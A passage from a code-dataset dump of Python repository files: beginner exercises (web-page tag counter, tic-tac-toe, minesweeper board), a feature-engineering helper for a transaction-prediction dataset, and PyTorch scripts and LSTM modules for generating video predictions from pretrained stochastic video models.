"alpha_fraction": 0.678966760635376,
"alphanum_fraction": 0.7011070251464844,
"avg_line_length": 20.58333396911621,
"blob_id": "dcb473db1f316d611fab334f57bdacf3a256fb35",
"content_id": "32539038c202327f3a4cabf84d7686595830194e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 271,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 12,
"path": "/exercise10.py",
"repo_name": "panagiotiskalogeridis/exercises",
"src_encoding": "UTF-8",
"text": "import urllib\r\nwebpage=raw_input('give the url of a website (eg.www.somepage.sth)')\r\nf=urllib.urlopen(webpage)\r\nhtml=f.read()\r\nsub1=\"</p>\"\r\nsub2=\"<br>\"\r\nsub3=\"href\"\r\na=html.count(sub1)\r\nb=html.count(sub2)\r\nlinks=html.count(sub3)\r\nlinechange=a+b\r\nprint linechange, links\r\n"
},
{
"alpha_fraction": 0.4569152891635895,
"alphanum_fraction": 0.48696595430374146,
"avg_line_length": 23.339448928833008,
"blob_id": "dc7543bedbd931a8fdce6bac235e947a7922f300",
"content_id": "7255015ee7bd6c8144ee86719ae508e921280d3a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2762,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 109,
"path": "/exercise7.py",
"repo_name": "panagiotiskalogeridis/exercises",
"src_encoding": "UTF-8",
"text": "import random\r\n\r\n\r\nprint \"The game of tic tac toe.\"\r\nboard=[\" \"]*10\r\nvacantblocks=9\r\n\r\n\r\ndef createboard(board):\r\n print' | |'\r\n print' ' + board[7] + ' | ' + board[8] + ' | ' + board[9]\r\n print' | |'\r\n print'-----------'\r\n print' | |'\r\n print' ' + board[4] + ' | ' + board[5] + ' | ' + board[6]\r\n print' | |'\r\n print'-----------'\r\n print' | |'\r\n print' ' + board[1] + ' | ' + board[2] + ' | ' + board[3]\r\n print' | |'\r\n print \"\\n\"\r\n\r\ndef marks():\r\n mark=''\r\n while not (mark=='X' or mark=='O'):\r\n print('Do you want to be X or O?')\r\n mark= input().upper()\r\n if mark=='X':\r\n return ['X', 'O']\r\n else: return ['O', 'X']\r\n\r\n\r\ndef firstturn():\r\n a=random.randint(1,2)\r\n if a==1:\r\n return \"user\"\r\n else: return \"computer\"\r\n\r\n\r\ndef winner(board):\r\n if (board[1]==board[2]==board[3]==\"X\")or(board[1]==board[2]==board[3]==\"O\"):\r\n return 1\r\n elif (board[4]==board[5]==board[6]==\"X\")or(board[4]==board[5]==board[6]==\"O\"):\r\n return 1\r\n elif (board[7]==board[8]==board[9]==\"X\")or(board[7]==board[8]==board[9]==\"O\"):\r\n return 1\r\n elif (board[7]==board[4]==board[1]==\"X\")or(board[7]==board[4]==board[1]==\"O\"):\r\n return 1\r\n elif (board[8]==board[5]==board[2]==\"X\")or(board[8]==board[5]==board[2]==\"O\"):\r\n return 1\r\n elif (board[3]==board[6]==board[9]==\"X\")or(board[3]==board[6]==board[9]==\"O\"):\r\n return 1\r\n elif (board[7]==board[5]==board[3]==\"X\")or(board[7]==board[5]==board[3]==\"O\"):\r\n return 1\r\n elif (board[1]==board[5]==board[9]==\"X\")or(board[1]==board[5]==board[9]==\"O\"):\r\n return 1\r\n else: return 0\r\n\r\n\r\ndef userplay(board):\r\n moveon=False\r\n while moveon==False:\r\n print \"Give a number between 1 and 9 to mark the block you want\"\r\n marked=input()\r\n if board[marked]==\" \":\r\n moveon=True\r\n board[marked]=mark[0]\r\n return board\r\n else: moveon=False\r\n\r\n\r\ndef computerplay(board):\r\n moveon=False\r\n while moveon==False:\r\n cc=random.randint(1,9)\r\n if board[cc]==\" \":\r\n moveon=True\r\n board[cc]=mark[1]\r\n return board\r\n else: moveon=False\r\n\r\n\r\ncreateboard(board)\r\nmark=marks()\r\nturn=firstturn()\r\n\r\n\r\nwhile vacantblocks>0:\r\n if turn==\"user\":\r\n turn=\"computer\"\r\n userplay(board)\r\n createboard(board)\r\n else:\r\n turn=\"user\"\r\n computerplay(board)\r\n createboard(board)\r\n if winner(board)==1:\r\n vacantblocks=0\r\n else:\r\n vacantblocks=vacantblocks-1\r\n\r\n\r\nif winner(board)==0:\r\n print \"It's a draw\"\r\nelse:\r\n if turn==\"user\":\r\n print \"Computer wins\"\r\n else:\r\n print \"You win!\"\r\n"
},
{
"alpha_fraction": 0.5761467814445496,
"alphanum_fraction": 0.589908242225647,
"avg_line_length": 22.22222137451172,
"blob_id": "4ce76580313018112274ed7ea1aad842dffd9a25",
"content_id": "a787fe768a7e0f22300e109551a013f06bd33660",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1090,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 45,
"path": "/exercise6.py",
"repo_name": "panagiotiskalogeridis/exercises",
"src_encoding": "UTF-8",
"text": "import random\r\n\r\ndef board(a,b,mines):\r\n p=b*\"0\"\r\n g=\"\"\r\n for i in range(0,a):\r\n g=g+(p+'\\n')\r\n g=getmines(g,mines)\r\n print g\r\n\r\ndef getmines(g,mines):\r\n new_list=(list(g))\r\n ties=len(new_list)\r\n newg=\"\"\r\n for i in range(0,mines):\r\n pos=random.randint(0,ties-1)\r\n while new_list[pos]==\"\\n\":\r\n pos=random.randint(0,ties-1)\r\n new_list[pos]=\"X\"\r\n for i in range (0,ties-1):\r\n newg=newg+new_list[i]\r\n g=newg\r\n return g\r\n\r\n\r\n\r\n\r\nprint \"This algorythm creates the board of the game minesweper.\\nGive values greater than zero and create your own board!\"\r\n\r\nheight=input(\"give the board's height:\" )\r\nif height==0:\r\n while height==0:\r\n height=input(\"please give value greater than zero\")\r\n\r\nlength=input(\"give the board's length:\" )\r\nif length==0:\r\n while length==0:\r\n length=input(\"please give value greater than zero\")\r\n\r\nmines=input(\"give the number of mines:\" )\r\nif mines==0:\r\n while mines==0:\r\n mines=input(\"please give value greater than zero\")\r\n\r\nboard(height,length,mines)\r\n"
},
{
"alpha_fraction": 0.32634228467941284,
"alphanum_fraction": 0.35486575961112976,
"avg_line_length": 22.32653045654297,
"blob_id": "0e9614ed2b0f9dbb932d38962714625fe9adf46a",
"content_id": "61f35d5a494e7a5487a0c24e871733bcadccf529",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1192,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 49,
"path": "/exercise1.py",
"repo_name": "panagiotiskalogeridis/exercises",
"src_encoding": "UTF-8",
"text": "def sumintervals(li):\r\n sum=0\r\n a=len(li)\r\n for i in range(0,a):\r\n b=li[i]\r\n for j in range(b[0]+1,b[1]):\r\n b.append(j)\r\n b.sort()\r\n li[i]=b\r\n li.sort()\r\n for i in range (0,a-1):\r\n for j in range (i+1,a):\r\n cell1=li[i]\r\n cell2=li[j]\r\n l1=len(cell1)\r\n if cell1[l1-1]>=cell2[0]:\r\n li[i]=li[i]+li[j]\r\n li[j]=[0]\r\n li.sort()\r\n for j in range (0,a):\r\n if li[j]!=0:\r\n cell=li[j]\r\n cell.sort()\r\n lcell=len(cell)\r\n for i in range (1,lcell):\r\n if cell[i-1]==cell[i]:\r\n cell[i-1]=0\r\n cell.sort()\r\n li[j]=cell\r\n fli=[]\r\n for i in range (0,a):\r\n lkl=len(li[i])\r\n kl=li[i]\r\n if kl[lkl-1]!=0:\r\n fli.append(li[i])\r\n lfli=len(fli)\r\n for i in range (0,lfli):\r\n presum=0\r\n k=fli[i]\r\n lk=len(k)\r\n j=0\r\n while j<=lk:\r\n if k[j]!=0:\r\n presum=k[lk-1]-k[j]\r\n j=lk+1\r\n else:\r\n j=j+1\r\n sum=sum+presum\r\n print sum\r\n"
}
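A quick check of the rewritten sumintervals above, using a classic overlapping example: [1,4] and [3,5] merge into [1,5] (length 4), and [7,10] adds 3, so the expected total is 7.

```
print sumintervals([[1, 4], [7, 10], [3, 5]])   # -> 7
```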
] | 4 |
EEEGUI/Nothing | https://github.com/EEEGUI/Nothing | b7e17835ddcfe963da3fc02623e0e9017710c85d | 933ec529b60b7ad95f09554596d5b5d1e7fe2c6a | fae2a7da50c799c8c67a1bb4bfd9048d7a92473f | refs/heads/master | 2020-04-15T05:55:33.416113 | 2019-01-09T01:03:27 | 2019-01-09T01:03:27 | 164,442,029 | 3 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6099050045013428,
"alphanum_fraction": 0.6099050045013428,
"avg_line_length": 34.82926940917969,
"blob_id": "eec84a6ed0f95e5ba6073314f41d9b31f17ec1ae",
"content_id": "52459eaed088a26cdfa965141003f8f5d03d663e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1474,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 41,
"path": "/feature_engineer.py",
"repo_name": "EEEGUI/Nothing",
"src_encoding": "UTF-8",
"text": "from utils import dataset\nfrom utils import config\nimport pandas as pd\n\n\nclass EloData(dataset.DataSet):\n def __init__(self, df_train, df_test, label_col_name):\n super(EloData, self).__init__(df_train, df_test, label_col_name)\n\n @staticmethod\n def aggregate(df, key, agg_config, col_tag):\n \"\"\"\n df group by key and the aggregate with agg_config\n :param df:\n :param key:\n :param agg_config: dict, eg: {\"colname\": [\"mean\", \"std\", ...]}\n :param col_tag: string, a tag of the df\n :return:\n \"\"\"\n agg_df = df.groupby([key]).agg(agg_config)\n # change the columns of (\"colname\", \"mean\") to \"colname_mean\"\n agg_df.columns = ['_'.join(col).strip() for col in agg_df.columns.values]\n agg_df.reset_index(inplace=True)\n\n count_key_df = df.groupby(key).size().reset_index(name='%s_count' % key)\n\n df = pd.merge(count_key_df, agg_df, on=key, how='left')\n\n df.columns = [col_tag + '_' + c if c != key else c for c in df.columns]\n\n return df\n\n\nif __name__ == '__main__':\n config = config.Config()\n df_train = pd.read_csv(config.TRAIN_PATH)\n df_test = pd.read_csv(config.TEST_PATH)\n df_history = pd.read_csv(config.HISTORY_PATH, parse_dates=[config.PARSE_DATE], nrows=config.NROWS)\n\n elo_data = EloData(df_train, df_test, config.LABEL_COL_NAME)\n print(elo_data.aggregate(df_history, config.KEY, config.HISTORY_AGG_FUNC, config.HISTORY_TAG))\n\n\n\n\n\n"
},
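The groupby/aggregate/flatten pattern used in EloData.aggregate above is worth seeing on a toy frame. The sketch below reproduces the column-flattening trick with made-up data; the values are invented for the demo.

```
import pandas as pd

df = pd.DataFrame({
    'card_id': ['a', 'a', 'b'],
    'purchase_amount': [1.0, 3.0, 5.0],
})

agg = df.groupby(['card_id']).agg({'purchase_amount': ['mean', 'max']})
# ('purchase_amount', 'mean') becomes 'purchase_amount_mean'
agg.columns = ['_'.join(col).strip() for col in agg.columns.values]
agg.reset_index(inplace=True)

counts = df.groupby('card_id').size().reset_index(name='card_id_count')
print(pd.merge(counts, agg, on='card_id', how='left'))
```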
{
"alpha_fraction": 0.52734375,
"alphanum_fraction": 0.5341796875,
"avg_line_length": 25.894737243652344,
"blob_id": "d73e7c8f4f8ce6e3d18a9da640f907b3b1a5d8b2",
"content_id": "269d61ef6d03b53590e7baec2bb2e4b612d0590e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1024,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 38,
"path": "/utils/config.py",
"repo_name": "EEEGUI/Nothing",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nclass Config(object):\n\n ## File Path ##\n\n TRAIN_PATH = 'data/train.csv'\n TEST_PATH = 'data/test.csv'\n HISTORY_PATH = 'data/historical_transactions.csv'\n MERCHANTS_PATH = 'data/merchants.csv'\n NEW_MERCHANT_TRANSACTIONS_PATH = 'data/new_merchant_transactions.csv'\n\n\n ## DataSet ##\n LABEL_COL_NAME = 'target'\n PARSE_DATE = 'purchase_date'\n NROWS = 2000\n KEY = 'card_id'\n\n HISTORY_TAG = 'hist'\n\n\n\n ## Feature engineer ##\n HISTORY_AGG_FUNC = {\n 'category_1': ['nunique'],\n 'category_2': ['mean'],\n 'category_3': ['nunique'],\n 'merchant_id': ['nunique'],\n 'merchant_category_id': ['nunique'],\n 'state_id': ['nunique'],\n 'city_id': ['nunique'],\n 'subsector_id': ['nunique'],\n 'purchase_amount': ['sum', 'mean', 'max', 'min', 'std'],\n 'installments': ['sum', 'mean', 'max', 'min', 'std'],\n 'purchase_date': [np.ptp, 'min', 'max'],\n 'month_lag': ['mean', 'max', 'min', 'std'],\n }\n\n\n"
},
{
"alpha_fraction": 0.5544554591178894,
"alphanum_fraction": 0.5547230243682861,
"avg_line_length": 29.867769241333008,
"blob_id": "2c5c3fac5dc69056022496fe369b6fe5a7d98d90",
"content_id": "c84578c29650965d783c402e4e9fe38db6be0364",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3737,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 121,
"path": "/utils/dataset.py",
"repo_name": "EEEGUI/Nothing",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nfrom sklearn.preprocessing import LabelEncoder, MinMaxScaler, Imputer\n\n\nclass DataSet(object):\n def __init__(self, df_train, df_test, label_col_name):\n \"\"\"\n :param df_train:DataFrame, contain the column of label\n :param df_test: Dataframe, don't contain label\n :param label_col_name: string, the name of label\n \"\"\"\n self.label_name = label_col_name\n self.len_train = len(df_train)\n self.len_test = len(df_test)\n self.label = df_train[label_col_name]\n\n df_train = self.drop_cols(df_train, [label_col_name])\n\n self.df_all = pd.concat([df_train, df_test], ignore_index=True)\n\n def merge_data(self, on_key, df_other):\n \"\"\"\n apply agg_config on df_other and then merge df_other with self.df_all on key\n :param on_key: the key(id) in both df_all and df_other\n :param df_other:\n :return:\n \"\"\"\n self.df_all = pd.merge(self.df_all, df_other, on=on_key, how='left')\n\n def process(self):\n \"\"\"\n pipline to process the data set\n override this function\n :return:\n \"\"\"\n pass\n\n def min_max_scale(self, cols_to_scale):\n \"\"\"\n scale self.df\n :param cols_to_scale: list of cols to scale\n :return:\n \"\"\"\n scale = MinMaxScaler()\n\n scale.fit(self.df_all.loc[:, cols_to_scale])\n self.df_all.loc[:, cols_to_scale] = scale.transform(self.df_all.loc[:, cols_to_scale])\n\n def fill_nan(self, dict_strategy):\n \"\"\"\n fill the nan of self.df_all by different strategy\n :param dict_strategy: dict, key:col name, value:strategy; strategy include \"mean\", \"median\", \"most_frequent\",\n int value\n :return:\n \"\"\"\n for key in dict_strategy:\n if type(dict_strategy[key]) is str:\n imputer = Imputer(strategy=dict_strategy[key])\n imputer.fit(self.df_all.loc[key])\n self.df_all.loc[key] = imputer.transform(self.df_all.loc[key])\n elif type(dict_strategy[key]) is int:\n self.df_all.loc[key].fillna(dict_strategy[key])\n else:\n print(\"strategy error\")\n pass\n\n def label_encoding(self, cols_to_encode):\n \"\"\"\n encoding the col with two class\n :param cols_to_encode: list of cols to encode\n :return:\n \"\"\"\n le = LabelEncoder()\n le.fit(self.df_all.loc[cols_to_encode])\n self.df_all.loc[cols_to_encode] = le.transform(self.df_all.loc[cols_to_encode])\n\n def process_datetime(self, cols_of_datetime):\n \"\"\"\n get the year, month, day, weekday from the datetime cols\n :param cols_of_datetime: cols with the type of datetime\n :return:\n \"\"\"\n pass\n\n @staticmethod\n def drop_cols(df, list_cols):\n \"\"\"\n del list_cols from df\n :param df:\n :param list_cols: list, cols to delete\n :return: df without list_cols\n \"\"\"\n return df.drop(labels=list_cols, axis=1)\n\n def makeup_feature(self):\n \"\"\"\n makeup new feature from the original feature\n please override this function\n :return:\n \"\"\"\n pass\n\n def get_df_train(self):\n \"\"\"\n get train data set from the concat of train and test\n :return:\n \"\"\"\n return self.df_all.loc[:self.len_train, :]\n\n def get_df_test(self):\n \"\"\"\n get test data set from the concat of train and label\n :return:\n \"\"\"\n return self.df_all.loc[self.len_train:, :]\n\n def get_label(self):\n \"\"\"\n :return:\n \"\"\"\n return self.label\n\n\n"
}
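A minimal usage sketch of the DataSet class above with a toy train/test pair; the column names and values are invented, and this only exercises the concat, scale, and split round trip.

```
import pandas as pd

train = pd.DataFrame({'f1': [1.0, 2.0, 3.0], 'target': [0.1, 0.2, 0.3]})
test = pd.DataFrame({'f1': [4.0, 5.0]})

ds = DataSet(train, test, 'target')
ds.min_max_scale(['f1'])      # fit the scaler on train+test together (this class's simplifying choice)
X_train = ds.get_df_train()   # first len(train) rows of the concatenated frame
X_test = ds.get_df_test()
y = ds.get_label()
print(X_train.shape, X_test.shape, y.shape)
```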
] | 3 |
edenton/kth_svg_model | https://github.com/edenton/kth_svg_model | 6779f6f30cb4c10c64833b74ce60f82da0725b8f | af3202094d573887f08ca1766adde4d79dafdfd4 | 0eeb3ca6ff9dfe7481fcb4a3a62b3198b2d2bd33 | refs/heads/master | 2021-04-09T12:53:42.438275 | 2018-03-16T21:26:01 | 2018-03-16T21:26:01 | 125,566,109 | 1 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.723247230052948,
"alphanum_fraction": 0.723247230052948,
"avg_line_length": 19.769229888916016,
"blob_id": "aa853a08ba8204937fc5cabec7705a88e2b23da3",
"content_id": "00a7dc43e5d143a46db11e5079d69c1851b935f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 271,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 13,
"path": "/README.md",
"repo_name": "edenton/kth_svg_model",
"src_encoding": "UTF-8",
"text": "# kth_svglp_model\n\nTo generate from the SVG-FP model run:\n```\npython generate_svg_fp.py\n```\n\nTo generate from the SVG-LP model run:\n```\npython generate_svg_lp.py\n```\n\nGenerated gifs will be saved in logs/svg_fp and logs/svg_lp for SVG-FP and SVG-LP models respectively. \n"
},
{
"alpha_fraction": 0.527694582939148,
"alphanum_fraction": 0.535179615020752,
"avg_line_length": 32.96186447143555,
"blob_id": "3dc36d4696550792ea075cd87ca5c8d7537606b5",
"content_id": "28bf90740896a8ffc0942e3d9884f3d3fecb3ea0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8016,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 236,
"path": "/generate_svg_lp.py",
"repo_name": "edenton/kth_svg_model",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport argparse\nimport os\nimport random\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nimport utils\nimport itertools\nimport progressbar\nimport numpy as np\nfrom scipy.ndimage.filters import gaussian_filter\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--batch_size', default=100, type=int, help='batch size')\nparser.add_argument('--data_root', default='/misc/vlgscratch3/FergusGroup/denton/data/KTH/processed/', help='root directory for data')\nparser.add_argument('--model_path', default='pretrained_models/kth_svg_lp/model.pth', help='model directory')\nparser.add_argument('--log_dir', default='logs/kth_svg_lp/', help='model directory')\nparser.add_argument('--name', default='', help='additional string for filename')\nparser.add_argument('--seed', default=1, type=int, help='manual seed')\nparser.add_argument('--n_past', type=int, default=10, help='number of frames to condition on')\nparser.add_argument('--n_future', type=int, default=20, help='number of frames to predict')\nparser.add_argument('--num_threads', type=int, default=0, help='number of data loading threads')\nparser.add_argument('--nsample', type=int, default=100, help='number of samples')\nparser.add_argument('--N', type=int, default=256, help='number of samples')\n\n\nopt = parser.parse_args()\nos.makedirs('%s/gifs' % opt.log_dir, exist_ok=True)\n\nopt.n_eval = opt.n_past+opt.n_future\nopt.max_step = opt.n_eval\n\nprint(\"Random Seed: \", opt.seed)\nrandom.seed(opt.seed)\ntorch.manual_seed(opt.seed)\ntorch.cuda.manual_seed_all(opt.seed)\ndtype = torch.cuda.FloatTensor\n\n\n\n# ---------------- load the models ----------------\ntmp = torch.load(opt.model_path)\nlstm = tmp['lstm']\nposterior = tmp['oracle']\nprior = tmp['prior']\nlstm.eval()\nprior.train()\nencoder = tmp['encoder']\ndecoder = tmp['decoder']\n#encoder.eval()\n#decoder.eval()\nlstm.batch_size = opt.batch_size\nposterior.batch_size = opt.batch_size\nprior.batch_size = opt.batch_size\nopt.latent_dim = tmp['opt'].latent_dim\nopt.posterior_dim = tmp['opt'].oracle_dim\n\n# --------- transfer to gpu ------------------------------------\nlstm.cuda()\nposterior.cuda()\nprior.cuda()\nencoder.cuda()\ndecoder.cuda()\n\n# ---------------- set the options ----------------\nopt.dataset = tmp['opt'].dataset\nopt.channels = tmp['opt'].channels\nopt.image_width = tmp['opt'].image_width\n\nprint(opt)\n\n\n# --------- load a dataset ------------------------------------\ntrain_data, test_data = utils.load_dataset(opt)\n\ntrain_loader = DataLoader(train_data,\n num_workers=opt.num_threads,\n batch_size=opt.batch_size,\n shuffle=True,\n drop_last=True,\n pin_memory=True)\ntest_loader = DataLoader(test_data,\n num_workers=opt.num_threads,\n batch_size=opt.batch_size,\n shuffle=True,\n drop_last=True,\n pin_memory=True)\n\ndef get_training_batch():\n while True:\n for sequence in train_loader:\n batch = utils.normalize_data(opt, dtype, sequence)\n yield batch\ntraining_batch_generator = get_training_batch()\n\ndef get_testing_batch():\n while True:\n for sequence in test_loader:\n batch = utils.normalize_data(opt, dtype, sequence)\n yield batch \ntesting_batch_generator = get_testing_batch()\n\n# --------- eval funtions ------------------------------------\n\ndef make_gifs(x, idx):\n # get posterior\n lstm.hidden = lstm.init_hidden()\n posterior.hidden = posterior.init_hidden()\n posterior_gen = []\n posterior_gen.append(x[0])\n x_in = x[0]\n for i in range(1, 
opt.n_eval):\n h = encoder(x_in)\n h_target = encoder(x[i])\n if type(h) is tuple:\n if i < opt.n_past:\n h, skip = h\n else:\n h, _ = h\n h_target, _ = h_target\n h = h.view(-1, opt.latent_dim).detach()\n h_target = h_target.view(-1, opt.latent_dim).detach()\n z_t, _, _= posterior(h_target)\n if i < opt.n_past:\n lstm(torch.cat([h, z_t], 1)) \n posterior_gen.append(x[i])\n x_in = x[i]\n else:\n h_pred = lstm(torch.cat([h, z_t], 1)).view(opt.batch_size, opt.latent_dim, 1, 1) \n x_in = decoder([[h_pred, skip], []]).detach()\n posterior_gen.append(x_in)\n \n\n nsample = opt.nsample\n ssim = np.zeros((opt.batch_size, nsample, opt.n_future))\n psnr = np.zeros((opt.batch_size, nsample, opt.n_future))\n progress = progressbar.ProgressBar(max_value=nsample).start()\n all_gen = []\n for s in range(nsample):\n progress.update(s+1)\n gen_seq = []\n gt_seq = []\n lstm.hidden = lstm.init_hidden()\n posterior.hidden = posterior.init_hidden()\n prior.hidden = prior.init_hidden()\n x_in = x[0]\n all_gen.append([])\n all_gen[s].append(x_in)\n for i in range(1, opt.n_eval):\n h = encoder(x_in)\n if type(h) is tuple:\n if i < opt.n_past:\t\n h, skip = h\n else:\n h, _ = h\n else:\n skip = []\n h = h.view(-1, opt.latent_dim).detach()\n if i + 1 < opt.n_past:\n h_target = encoder(x[i])\n if type(h_target) is tuple:\n h_target = h_target[0]\n h_target = h_target.view(-1, opt.latent_dim).detach()\n z_t, _, _ = posterior(h_target)\n else:\n z_t, _, _ = prior(h)\n if i < opt.n_past:\n lstm(torch.cat([h, z_t], 1))\n x_in = x[i]\n all_gen[s].append(x_in)\n else:\n h = lstm(torch.cat([h, z_t], 1)).view(opt.batch_size, opt.latent_dim, 1, 1).detach()\n x_in = decoder([[h, skip], []]).detach()\n gen_seq.append(x_in.data.cpu().numpy())\n all_gen[s].append(x_in)\n gt_seq.append(x[i].data.cpu().numpy())\n _, ssim[:, s, :], psnr[:, s, :] = utils.eval_seq(gt_seq, gen_seq)\n\n progress.finish()\n utils.clear_progressbar()\n\n ###### ssim ######\n for i in range(opt.batch_size):\n gifs = [ [] for t in range(opt.n_eval) ]\n text = [ [] for t in range(opt.n_eval) ]\n mean_ssim = np.mean(psnr[i, :, :], 1)\n ordered = np.argsort(mean_ssim)\n for t in range(opt.n_eval):\n # gt \n gifs[t].append(add_border(x[t][i], 'green'))\n text[t].append('Ground\\ntruth')\n #posterior \n if t < opt.n_past:\n color = 'green'\n else:\n color = 'red'\n gifs[t].append(add_border(posterior_gen[t][i], color))\n text[t].append('Approx.\\nposterior')\n # best \n if t < opt.n_past:\n color = 'green'\n else:\n color = 'red'\n sidx = ordered[-1]\n gifs[t].append(add_border(all_gen[sidx][t][i], color))\n text[t].append('Best PSNR')\n # random 3\n for s in range(3):\n sidx = s*20\n gifs[t].append(add_border(all_gen[sidx][t][i], color))\n text[t].append('Random\\nsample %d' % (s+1))\n\n fname = '%s/gifs/best_psnr_%d.gif' % (opt.log_dir, idx+i) \n utils.save_gif_with_text(fname, gifs, text)\n\ndef add_border(x, color, pad=1):\n w = x.size()[1]\n nc = x.size()[0]\n px = Variable(torch.zeros(3, w+2*pad+30, w+2*pad))\n if color == 'red':\n px[0] =0.7 \n elif color == 'green':\n px[1] = 0.7\n if nc == 1:\n for c in range(3):\n px[c, pad:w+pad, pad:w+pad] = x\n else:\n px[:, pad:w+pad, pad:w+pad] = x\n return px\n\nfor i in range(0, opt.N, opt.batch_size):\n x = next(testing_batch_generator)\n make_gifs(x, i)\n print(i)\n\n"
},
{
"alpha_fraction": 0.5862069129943848,
"alphanum_fraction": 0.5911803841590881,
"avg_line_length": 38.86092758178711,
"blob_id": "5f890f424581544c163806622db41236c8b5002d",
"content_id": "9c2cf00a867de9917ff66961922378d2d82ddea2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6032,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 151,
"path": "/models/lstm.py",
"repo_name": "edenton/kth_svg_model",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\nclass lstm2(nn.Module):\n def __init__(self, input_size, output_size, hidden_size, batch_size, normalize=False):\n super(lstm2, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_size = hidden_size\n self.batch_size = batch_size\n self.embed = nn.Linear(input_size, hidden_size)\n self.lstm0 = nn.LSTMCell(hidden_size, hidden_size)\n self.lstm1 = nn.LSTMCell(hidden_size, hidden_size)\n self.output = nn.Sequential(\n nn.Linear(hidden_size, output_size),\n #nn.BatchNorm1d(output_size),\n nn.Tanh())\n self.hidden = self.init_hidden()\n self.normalize = normalize\n\n def init_hidden(self):\n return [(Variable(torch.zeros(self.batch_size, self.hidden_size).cuda()), \n Variable(torch.zeros(self.batch_size, self.hidden_size).cuda())),\n (Variable(torch.zeros(self.batch_size, self.hidden_size).cuda()), \n Variable(torch.zeros(self.batch_size, self.hidden_size).cuda()))]\n\n def forward(self, input):\n embedded = self.embed(input.view(-1, self.input_size))\n self.hidden[0] = self.lstm0(embedded, self.hidden[0])\n self.hidden[1] = self.lstm1(self.hidden[0][0], self.hidden[1])\n output = self.output(self.hidden[1][0])\n if self.normalize:\n return nn.functional.normalize(output, p=2)\n else:\n return output\n\n\nclass lstm(nn.Module):\n def __init__(self, input_size, output_size, hidden_size, n_layers, batch_size, normalize=False):\n super(lstm, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_size = hidden_size\n self.batch_size = batch_size\n self.n_layers = n_layers\n self.embed = nn.Linear(input_size, hidden_size)\n self.lstm = nn.ModuleList([nn.LSTMCell(hidden_size, hidden_size) for i in range(self.n_layers)])\n self.output = nn.Sequential(\n nn.Linear(hidden_size, output_size),\n #nn.BatchNorm1d(output_size),\n nn.Tanh())\n self.hidden = self.init_hidden()\n self.normalize = normalize\n\n def init_hidden(self):\n hidden = []\n for i in range(self.n_layers):\n hidden.append((Variable(torch.zeros(self.batch_size, self.hidden_size).cuda()),\n Variable(torch.zeros(self.batch_size, self.hidden_size).cuda())))\n return hidden\n\n def forward(self, input):\n embedded = self.embed(input.view(-1, self.input_size))\n h_in = embedded\n for i in range(self.n_layers):\n self.hidden[i] = self.lstm[i](h_in, self.hidden[i])\n h_in = self.hidden[i][0]\n\n output = self.output(h_in)\n if self.normalize:\n return nn.functional.normalize(output, p=2)\n else:\n return output\n\n\nclass lstm_prior(nn.Module):\n def __init__(self, input_size, output_size, prior_dim, hidden_size, n_layers, batch_size, normalize=False):\n super(lstm_prior, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_size = hidden_size\n self.batch_size = batch_size\n self.n_layers = n_layers\n self.embed = nn.Linear(input_size, hidden_size)\n self.lstm = nn.ModuleList([nn.LSTMCell(hidden_size, hidden_size) for i in range(self.n_layers)])\n self.output = nn.Sequential(\n nn.Linear(hidden_size, output_size),\n #nn.BatchNorm1d(output_size),\n nn.Tanh())\n\n self.mu_net = nn.Linear(hidden_size, prior_dim)\n self.logvar_net = nn.Linear(hidden_size, prior_dim)\n self.hidden = self.init_hidden()\n self.normalize = normalize\n\n def init_hidden(self):\n hidden = []\n for i in range(self.n_layers):\n hidden.append((Variable(torch.zeros(self.batch_size, self.hidden_size).cuda()),\n Variable(torch.zeros(self.batch_size, 
self.hidden_size).cuda())))\n return hidden\n\n def forward(self, input):\n embedded = self.embed(input.view(-1, self.input_size))\n h_in = embedded\n for i in range(self.n_layers):\n self.hidden[i] = self.lstm[i](h_in, self.hidden[i])\n h_in = self.hidden[i][0]\n\n mu = self.mu_net(h_in)\n logvar = self.logvar_net(h_in)\n output = self.output(h_in)\n if self.normalize:\n output = nn.functional.normalize(output, p=2)\n return output, mu, logvar\n\nclass oracle_lstm(nn.Module):\n def __init__(self, input_size, output_size, hidden_size, batch_size):\n super(oracle_lstm, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_size = hidden_size\n self.batch_size = batch_size\n self.embed = nn.Linear(input_size, hidden_size)\n self.lstm = nn.LSTMCell(hidden_size, hidden_size)\n self.mu_net = nn.Linear(hidden_size, output_size)\n self.logvar_net = nn.Linear(hidden_size, output_size)\n self.hidden = self.init_hidden()\n\n def 